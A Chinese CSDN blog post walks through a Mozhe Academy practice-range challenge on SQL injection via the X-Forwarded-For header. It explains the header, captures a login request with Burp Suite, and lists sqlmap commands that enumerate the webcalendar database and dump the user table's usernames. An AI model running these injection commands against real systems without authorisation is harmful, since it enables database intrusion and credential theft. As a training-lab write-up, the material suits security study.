墨者靶场mysql头注入_靶场练习-墨者学院-sql注入-'X-Forwarded-For' 字段注入

本文介绍了X-Forwarded-For请求头在HTTP中的作用,以及如何在黑盒测试中利用该头信息寻找SQL注入点。通过Burp Suite抓包并使用sqlmap工具,对登录表单进行参数测试,读取数据库内容,以获取账号和密码信息。
摘要由CSDN通过智能技术生成

X-Forwarded-For知识点:

X-Forwarded-For 是一个 HTTP 扩展头部。

X-Forwarded-For 请求头格式:X-Forwarded-For:client,proxy1,proxy2

X-Forwarded-For: client, proxy1, proxy2

如果一个 HTTP 请求到达服务器之前,经过了三个代理 Proxy1、Proxy2、Proxy3,IP 分别为 IP1、IP2、IP3,用户真实 IP 为 IP0,那么按照 XFF 标准,服务端最终会收到以下信息:

X-Forwarded-For: IP0, IP1, IP2

题目描述

背景介绍

某业务系统,安全工程师"墨者"进行授权黑盒测试,系统的业主单位也没有给账号密码,怎么测?

实训目标

1、掌握SQL注入的基本原理;

2、了解服务器获取客户端IP的方式;

3、了解SQL注入的工具使用;

解题方向

对登录表单的各参数进行测试,找到SQL注入点,对数据库内容进行读取,找到账号与密码。

解题思路

1.打开靶场环境

e5c77869d8cfa8880aa6504f15e83842.png

2.按题意burp抓包测试X-Forwarded-For字段,可能存在注入点

d3776a730f68aec9f16996b30e097c37.png

acf1dfb8d1c54d27af564323a6c5918f.png

3.将请求头放到txt,sqlmap测试

python2 sqlmap.py -r 1.txt --dbs --batch

37dfd2ad6cee044dca7903cdf5cf85ae.png

python2 sqlmap.py -r 1.txt -D webcalendar --tables --batch

1ba938b9a883ef10aaecea252e1c0c54.png

python2 sqlmap.py -r 1.txt -D webcalendar -T user --columns --batch

1e2f24f3fee5d97f7ed467287337db40.png

python2 sqlmap.py -r 1.txt -D webcalendar -T user -C username --dump --batch

1b50f9ac3bd139743fb543cb233a372f.png

python2 sqlmap.py -r 1.txt -D webcalendar -T user -C username --dump --batch

f6215e54633c6bad37e866079575c072.png

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值